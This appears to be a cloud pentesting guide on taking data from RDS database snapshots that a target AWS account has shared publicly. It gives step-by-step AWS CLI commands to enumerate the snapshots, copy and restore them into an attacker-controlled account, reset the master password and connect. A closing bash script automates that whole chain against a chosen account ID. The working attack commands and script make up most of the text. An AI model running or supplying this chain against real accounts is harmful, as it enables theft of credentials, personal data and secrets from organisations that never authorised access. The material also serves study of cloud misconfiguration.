Cloud Pentesting: 03_AWS [ Publicly available RDS snapshot ]

 Identify RDS database snapshots that a known AWS account has shared publicly, copy and restore them into an attacker-controlled account, and extract the data they contain. A public snapshot is a full copy of the database at the time it was taken, so whatever was in it (credentials, PII, application secrets) is exposed to every AWS account.


🧭 Attack Flow (Generic Steps)

  1. Start with Target AWS Account ID

    • Obtain through passive recon, cloud asset leaks, public repos, etc.

  2. Search for Public RDS Snapshots

    • Use the AWS CLI to enumerate RDS snapshots with --snapshot-type public (the call has to be made in every region the target might use; snapshots are regional)

    • Filter results by owner. The owner is not a separate field in the output; the owning account ID is the fifth component of the snapshot ARN (arn:aws:rds:<region>:<account_id>:snapshot:<name>), so filter on the ARN

    aws rds describe-db-snapshots \
      --snapshot-type public \
      --region <region> \
      --query "DBSnapshots[?contains(DBSnapshotArn, '<target_account_id>')].[DBSnapshotArn,Engine,Encrypted,MasterUsername]" \
      --output table

    • Aurora snapshots are a separate resource type; repeat the search with aws rds describe-db-cluster-snapshots --snapshot-type public
  3. Check if Snapshot is Unencrypted

    • If "Encrypted": false, the snapshot can be copied and restored by any AWS account

    • AWS does not allow an encrypted snapshot to be made public, so everything returned by the public search is unencrypted. The check matters for snapshots shared directly with your account: if "Encrypted": true, restoring also requires that the owner granted you use of the customer-managed KMS key (and snapshots encrypted with the default aws/rds key cannot be shared at all)

  4. Copy the Snapshot to Attacker's Account

    • Copy first so you own a snapshot the target cannot take away: the owner can withdraw public sharing at any time, and a shared automated snapshot cannot be restored directly at all. Reference the source by its full ARN and run the copy in the snapshot's region

    aws rds copy-db-snapshot \
      --region <region> \
      --source-db-snapshot-identifier arn:aws:rds:<region>:<target_account_id>:snapshot:<snapshot_name> \
      --target-db-snapshot-identifier <new_snapshot_name>

    • The copy is asynchronous; wait for it with aws rds wait db-snapshot-available --db-snapshot-identifier <new_snapshot_name> before restoring
  5. Restore Snapshot into New RDS Instance

    • The engine (mysql, postgres, etc.) is fixed by the snapshot; --engine is optional and, if given, must match the snapshot's Engine value from step 2

    • Optionally make it publicly accessible. This only assigns a public address; the instance still lands in your default VPC security group, which must allow inbound traffic on the database port from your IP (or attach your own group with --vpc-security-group-ids)

    aws rds restore-db-instance-from-db-snapshot \
      --region <region> \
      --db-instance-identifier <instance_name> \
      --db-snapshot-identifier <new_snapshot_name> \
      --db-instance-class db.t3.micro \
      --publicly-accessible

    • Restoring takes several minutes; aws rds wait db-instance-available --db-instance-identifier <instance_name> blocks until it is usable
  6. Connect to Restored DB Instance

    • The restored instance keeps the snapshot's master username (MasterUsername in the describe output) but you do not know its password. As the new owner you can simply set one:

      aws rds modify-db-instance --db-instance-identifier <instance_name> --master-user-password '<new_password>' --apply-immediately

    • Obtain the endpoint and master username via:

      aws rds describe-db-instances --db-instance-identifier <instance_name> --query "DBInstances[0].[Endpoint.Address,Endpoint.Port,MasterUsername]" --output text

    • Connect using standard tools, e.g. for MySQL or PostgreSQL:

      mysql -h <endpoint> -u <master_user> -p
      psql -h <endpoint> -U <master_user> -d postgres
  7. Explore and Exfiltrate Data

    • Query internal tables

    • Look for credentials, PII, secrets, logs, etc.
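The whole flow from step 2 to step 6, put together as one script. This is an added example, not a tool from the original page: the account ID, region, snapshot names, master users and the sample describe-db-snapshots output embedded below are constructed placeholders, and the only API calls used are the AWS CLI commands already shown in the steps above (plus the matching `aws rds wait` subcommands). The filtering logic runs offline against the embedded sample; the AWS calls only fire when the script is invoked with a target account, region and new master password.

```shell
#!/usr/bin/env bash
# Added example: hunt for public RDS snapshots owned by one account, copy and
# restore them, and take over the master password. Identifiers are placeholders.
set -eu

tab=$(printf '\t')

# Owning account of an RDS snapshot ARN: arn:aws:rds:<region>:<account>:snapshot:<name>
snapshot_owner() {
  printf '%s\n' "$1" | cut -d: -f5
}

# List public snapshots in a region as tab-separated rows:
#   <DBSnapshotArn> <Encrypted> <Engine> <MasterUsername>
list_public_snapshots() {
  aws rds describe-db-snapshots --region "$1" --snapshot-type public \
    --query 'DBSnapshots[].[DBSnapshotArn,Encrypted,Engine,MasterUsername]' \
    --output text
}

# Keep only rows owned by the target account and not encrypted (text output
# prints booleans as True/False). Encrypted snapshots cannot be public, but the
# same filter is correct for snapshots shared directly with our account.
select_restorable() {
  target=$1
  while IFS=$tab read -r arn encrypted engine user; do
    [ -n "$arn" ] || continue
    [ "$(snapshot_owner "$arn")" = "$target" ] || continue
    [ "$encrypted" = "False" ] || continue
    printf '%s\t%s\t%s\n' "$arn" "$engine" "$user"
  done
}

# Copy the public snapshot into our account (the owner can revoke public sharing
# at any time), restore it, set a master password we know, and print the endpoint.
restore_snapshot() {
  region=$1 src_arn=$2 name=$3 new_password=$4
  aws rds copy-db-snapshot --region "$region" \
    --source-db-snapshot-identifier "$src_arn" \
    --target-db-snapshot-identifier "$name" >/dev/null
  aws rds wait db-snapshot-available --region "$region" --db-snapshot-identifier "$name"
  # The engine is fixed by the snapshot; the default VPC security group must
  # still allow inbound traffic on the DB port from our IP for the public
  # address to be reachable.
  aws rds restore-db-instance-from-db-snapshot --region "$region" \
    --db-instance-identifier "$name" \
    --db-snapshot-identifier "$name" \
    --db-instance-class db.t3.micro \
    --publicly-accessible >/dev/null
  aws rds wait db-instance-available --region "$region" --db-instance-identifier "$name"
  # The snapshot keeps the original master username but not a password we know.
  aws rds modify-db-instance --region "$region" --db-instance-identifier "$name" \
    --master-user-password "$new_password" --apply-immediately >/dev/null
  aws rds wait db-instance-available --region "$region" --db-instance-identifier "$name"
  aws rds describe-db-instances --region "$region" --db-instance-identifier "$name" \
    --query 'DBInstances[0].[Endpoint.Address,Endpoint.Port,MasterUsername]' --output text
}

main() {
  target=$1 region=$2 password=$3
  list_public_snapshots "$region" | select_restorable "$target" |
  while IFS=$tab read -r arn engine user; do
    name="pub-${arn##*:}"
    echo "[*] restoring $engine snapshot $arn (master user: $user) as $name"
    restore_snapshot "$region" "$arn" "$name" "$password"
  done
}

# Constructed sample of list_public_snapshots output for offline use: two
# snapshots from the target account 111122223333 (one encrypted) and one from
# an unrelated account.
SAMPLE_DESCRIBE_OUTPUT=$(printf '%s\tFalse\tpostgres\tdbadmin\n%s\tFalse\tmysql\tadmin\n%s\tTrue\tmysql\tadmin\n' \
  'arn:aws:rds:us-east-1:111122223333:snapshot:prod-customers-2024' \
  'arn:aws:rds:us-east-1:999999999999:snapshot:someone-elses-db' \
  'arn:aws:rds:us-east-1:111122223333:snapshot:prod-customers-encrypted')

# Run the filter over the sample without touching AWS.
demo_offline() {
  printf '%s\n' "$SAMPLE_DESCRIBE_OUTPUT" | select_restorable 111122223333
}

# Only talk to AWS when invoked as: ./rds_public_snapshot.sh <account_id> <region> <new_password>
if [ "$#" -ge 3 ]; then
  main "$@"
else
  demo_offline
fi
```

Run with no arguments to see the filter pick out the single unencrypted target-owned snapshot from the sample; run with an account ID, region and password to perform the real copy, restore and password reset, after which the printed endpoint, port and master user plug straight into mysql or psql. Each restored instance is billed and left running, so tear it down when finished.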
